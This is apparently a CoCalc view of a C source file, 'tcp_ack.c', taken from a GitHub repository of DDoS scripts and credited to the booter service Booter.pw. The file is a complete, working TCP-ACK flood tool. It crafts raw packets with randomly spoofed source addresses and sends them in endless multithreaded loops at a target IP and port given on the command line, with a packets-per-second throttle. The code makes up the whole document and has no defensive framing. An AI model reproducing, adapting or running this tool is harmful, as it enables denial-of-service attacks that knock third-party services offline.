CoCalc -- tcp

GitHub Repository: R00tS3c/DDOS-RootSec
Path: blob/master/DDOS Scripts/L4/TCP/tcp_ack.c
⁴⁵⁶⁵ views
1
// TCP-ACK spoofed attack.
2
// © Booter.pw 2019
3

4
// Imports.
5
#include<stdio.h>
6
#include<string.h>
7
#include<sys/socket.h>
8
#include<stdlib.h>
9
#include<errno.h>
10
#include<netinet/tcp.h>
11
#include <arpa/inet.h>
12
#include<netinet/ip.h>
13
#include <pthread.h>
14
#include <stdint.h>
15
#include <unistd.h>
16
#include <sys/types.h>
17
#include <stdbool.h>
18
#include <time.h>
19

20
// Declaration of start global variables.
21
static unsigned int floodport;
22
#define BUFFER_SIZE 100
23
char sourceip[17];
24
volatile int limiter; // PPS Limitator.
25
volatile unsigned int pps; // PPS per Second, Global variable including for Threads.
26
volatile unsigned int sleeptime = 100; // Sleep in miliseconds for each packet if pps exeded.
27
volatile unsigned int lenght_pkt = 0;
28

29
// Structure of the pseudo-header object.
30
struct pseudo_header
31
{
32
    u_int32_t source_address;
33
    u_int32_t dest_address;
34
    u_int8_t placeholder;
35
    u_int8_t protocol;
36
    u_int16_t tcp_length;
37
    struct tcphdr tcp;
38
};
39

40
unsigned short checksum_tcp_packet(unsigned short *ptr,int nbytes) {
41
    // Variables for csum.
42
    register long sum;
43
    unsigned short oddbyte;
44
    register short answer;
45
 
46
    sum=0;
47
    while(nbytes>1) {
48
        sum+=*ptr++;
49
        nbytes-=2;
50
    }
51
    if(nbytes==1) {
52
        oddbyte=0;
53
        *((u_char*)&oddbyte)=*(u_char*)ptr;
54
        sum+=oddbyte;
55
    }
56
 
57
    sum = (sum>>16)+(sum & 0xffff);
58
    sum = sum + (sum>>16);
59
    answer=(short)~sum;
60

61
    return(answer);
62
}
63

64
void *flooding_thread(void *par1)
65
{
66
    // Make socket
67
    int s = socket (PF_INET, SOCK_RAW, IPPROTO_TCP);
68
    if(s == -1)
69
    {
70
        perror("[!] For use Script you need root stupid...");
71
        exit(1);
72
    }
73

74
    // Declares
75
    char *targettr = (char *)par1;
76
    char datagram[4096] , source_ip[32] , *data , *pseudogram;
77
    
78
    // Zero out the packet buffer.
79
    memset (datagram, 0, 4096);
80

81
    // IPv4 header.
82
    struct iphdr *iph = (struct iphdr *) datagram;
83

84
    // TCP header.
85
    struct tcphdr *tcph = (struct tcphdr *) (datagram + sizeof (struct ip));
86
    struct sockaddr_in sin;
87
    struct pseudo_header psh;
88

89
    //Data part
90
    data = datagram + sizeof(struct iphdr) + sizeof(struct tcphdr);
91
    if (lenght_pkt == 0)  { // Bypass pps.
92
        data = "";
93
    }
94

95
    // Source Address and Such.
96
    char primera [ 20 ] ;
97
    int one_r = random_number_beetwhen(1, 250);
98
    int two_r = random_number_beetwhen(1, 250);
99
    int three_r = random_number_beetwhen(1, 250);
100
    int four_r = random_number_beetwhen(1, 250);
101

102
    snprintf(primera, sizeof(primera)-1, "%d.%d.%d.%d", one_r, two_r, three_r, four_r);
103
    snprintf(sourceip, sizeof(sourceip)-1, primera);
104
    strcpy(source_ip , sourceip);
105
    sin.sin_family = AF_INET;
106
    int rdzeroport;
107
    if (floodport == 1) { // Random destination port.
108
        rdzeroport = random_number_beetwhen(2, 65535);
109
        sin.sin_port = htons(rdzeroport);
110
        tcph->dest = htons (rdzeroport);
111
    } else {
112
        sin.sin_port = htons(floodport);
113
        tcph->dest = htons (floodport);
114
    }
115

116
    // All other IP packet header.
117
    sin.sin_addr.s_addr = inet_addr (targettr);
118
    iph->ihl = 5;
119
    iph->version = 4;
120
    iph->tos = 0;
121
    iph->tot_len = sizeof (struct iphdr) + sizeof (struct tcphdr) + strlen(data);
122
    iph->id = htons(1);
123
    iph->frag_off = 0;
124
    iph->ttl = 64;
125
    iph->protocol = IPPROTO_TCP;
126
    iph->check = 0; 
127
    iph->saddr = inet_addr ( source_ip );  
128
    iph->daddr = sin.sin_addr.s_addr;
129
    iph->check = checksum_tcp_packet ((unsigned short *) datagram, iph->tot_len);
130
    int randSeq = random_number_beetwhen(10000, 99999);
131
    int randAckSeq = random_number_beetwhen(10000, 99999);
132
    int randSP = random_number_beetwhen(2, 65535);
133
    //int randPD = random_number_beetwhen(2, 65535);
134
    //int randttl = random_number_beetwhen(1, 255);
135
    //int randihl = random_number_beetwhen(4, 7);
136
    int randWin = random_number_beetwhen(1000, 9999);
137
    tcph->source = randSP;
138
    tcph->seq = randSeq;
139
    tcph->ack_seq = randAckSeq;
140
    tcph->doff = 5;
141
    tcph->fin=0;
142
    tcph->syn=0;
143
    tcph->rst=0;
144
    tcph->psh=0;
145
    tcph->ack=1;
146
    tcph->urg=0;
147
    tcph->window = randWin;
148
    tcph->check = 0;
149
    tcph->urg_ptr = 0;
150

151
    psh.source_address = inet_addr( source_ip );
152
    psh.dest_address = sin.sin_addr.s_addr;
153
    psh.placeholder = 0;
154
    psh.protocol = IPPROTO_TCP;
155
    psh.tcp_length = htons(sizeof(struct tcphdr) + strlen(data) );
156
    int psize = sizeof(struct pseudo_header) + sizeof(struct tcphdr) + strlen(data);
157
    pseudogram = malloc(psize);
158
    memcpy(pseudogram , (char*) &psh , sizeof (struct pseudo_header));
159
    memcpy(pseudogram + sizeof(struct pseudo_header) , tcph , sizeof(struct tcphdr) + strlen(data));
160
    tcph->check = checksum_tcp_packet( (unsigned short*) pseudogram , psize);
161
    free(pseudogram);
162
    int one = 1;
163
    const int *val = &one;
164
    if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0)
165
    {
166
        exit(0);
167
    }
168
    int i;
169
    while (1)
170
    {
171
        //Send the packet
172
        if (sendto (s, datagram, iph->tot_len ,  0, (struct sockaddr *) &sin, sizeof (sin)) < 0)       /* a normal send() */
173
        {
174
            //ok
175
        } else {
176
            // Generate new IP.
177
            one_r = random_number_beetwhen(1, 250);
178
            two_r = random_number_beetwhen(1, 250);
179
            three_r = random_number_beetwhen(1, 250);
180
            four_r = random_number_beetwhen(1, 250);
181
            snprintf(primera, sizeof(primera)-1, "%d.%d.%d.%d", one_r, two_r, three_r, four_r);
182
            snprintf(sourceip, sizeof(sourceip)-1, primera);
183
            strcpy(source_ip , sourceip);
184
            iph->saddr = inet_addr ( source_ip ); 
185
            psh.source_address = inet_addr( source_ip );
186
            if (lenght_pkt == 0) { // Bypass pps.
187
                data = "";
188
            }
189
            if (floodport == 0) {
190
                rdzeroport = random_number_beetwhen(2, 65535);
191
                sin.sin_port = htons(rdzeroport);
192
                tcph->dest = htons (rdzeroport);
193
            } else {
194
                sin.sin_port = htons(floodport);
195
                tcph->dest = htons (floodport);
196
            }
197
            randSeq = random_number_beetwhen(10000, 99999);
198
            randAckSeq = random_number_beetwhen(10000, 99999);
199
            randSP = random_number_beetwhen(2, 65535);
200
            //randPD = random_number_beetwhen(2, 65535);
201
            //randttl = random_number_beetwhen(1, 255);
202
            tcph->source = randSP;
203
            tcph->doff = 5;      // First and only TCP segment, reset option. 
204
            tcph->seq = htons(randSeq);
205
            tcph->ack  = 1;
206
            tcph->ack_seq = randAckSeq;
207
            tcph->psh  = 0; 
208
            tcph->fin  = 0;
209
            tcph->rst  = 0;
210
            tcph->res2 = 0;
211
            tcph->doff = 5;
212
            tcph->syn = 0; 
213
            tcph->urg  = 0;
214
            tcph->urg_ptr = 0;
215

216
            tcph->window = htons(512);
217
            tcph->check = 0;
218

219
            iph->tot_len = sizeof (struct iphdr) + sizeof (struct tcphdr) + strlen(data);
220
            iph->protocol = IPPROTO_TCP;
221
            iph->check = 0;
222
            iph->daddr = sin.sin_addr.s_addr;
223
            iph->check = checksum_tcp_packet ((unsigned short *) datagram, iph->tot_len);
224
            psh.tcp_length = htons(sizeof(struct tcphdr) + strlen(data) );
225
            int psize = sizeof(struct pseudo_header) + sizeof(struct tcphdr) + strlen(data);
226
            pseudogram = malloc(psize);
227
            memcpy(pseudogram , (char*) &psh , sizeof (struct pseudo_header));
228
            memcpy(pseudogram + sizeof(struct pseudo_header) , tcph , sizeof(struct tcphdr) + strlen(data));
229
            tcph->check = checksum_tcp_packet( (unsigned short*) pseudogram , psize);
230
            free(pseudogram);
231
            int one = 1;
232
            const int *val = &one;
233
            if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0)
234
            {
235
                exit(0);
236
            }
237
            pps++;
238
            if(i >= limiter)
239
            {
240
                i = 0;
241
                usleep(sleeptime);
242
            }
243
            i++;
244
        }   
245
    }
246
}
247
int random_number_beetwhen(int min, int max) {
248
   static bool first = true;
249
   if (first) {  
250
      srand( time(NULL) );
251
      first = false;
252
   }
253
   return min + rand() % (max + 1 - min);
254
}
255
int main(int argc, char *argv[ ])
256
{
257
    if(argc < 6){
258
        fprintf(stderr, "[+] TCP-ACK © Booter.pw 2019 by @Alemalakra.\n");
259
        fprintf(stdout, "[+] Usage: %s <IP> <PORT> <THREADS> <TIME> <PPS>\n", argv[0]);
260
        exit(-1);
261
    }
262
    int multiplier = 20;
263
    pps = 0;
264
    limiter = 0;
265

266
    // Arguments of Method.
267

268
    floodport = atoi(argv[2]);
269
    void * target = argv[1];
270
    int maxim_pps = atoi(argv[5]);
271
    int num_threads = atoi(argv[3]);
272
    lenght_pkt = 0;
273
    pthread_t thread[num_threads];
274
    int alem = 0;
275
    int i;
276
    fprintf(stdout, "[+] Starting threads (This may take some seconds.)\n");
277
    for(alem = 0;alem<num_threads;alem++){
278
      pthread_create( &thread[alem], NULL, &flooding_thread, (void *)argv[1]); // Target
279
    }
280
    fprintf(stdout, "[-] Attack started.\n");
281
    for(i = 0;i<(atoi(argv[4])*multiplier);i++) {
282
        usleep((1000/multiplier)*1000);
283
        if((pps*multiplier) > maxim_pps)
284
        {
285
            if(1 > limiter)
286
            {
287
                sleeptime+=100;
288
            } else {
289
                limiter--;
290
            }
291
        } else {
292
            limiter++;
293
            if(sleeptime > 25)
294
            {
295
                sleeptime-=25;
296
            } else {
297
                sleeptime = 0;
298
            }
299
        }
300
        pps = 0;
301
    }    
302
     
303
    return 0;
304
}
305
Product

Resources

Company
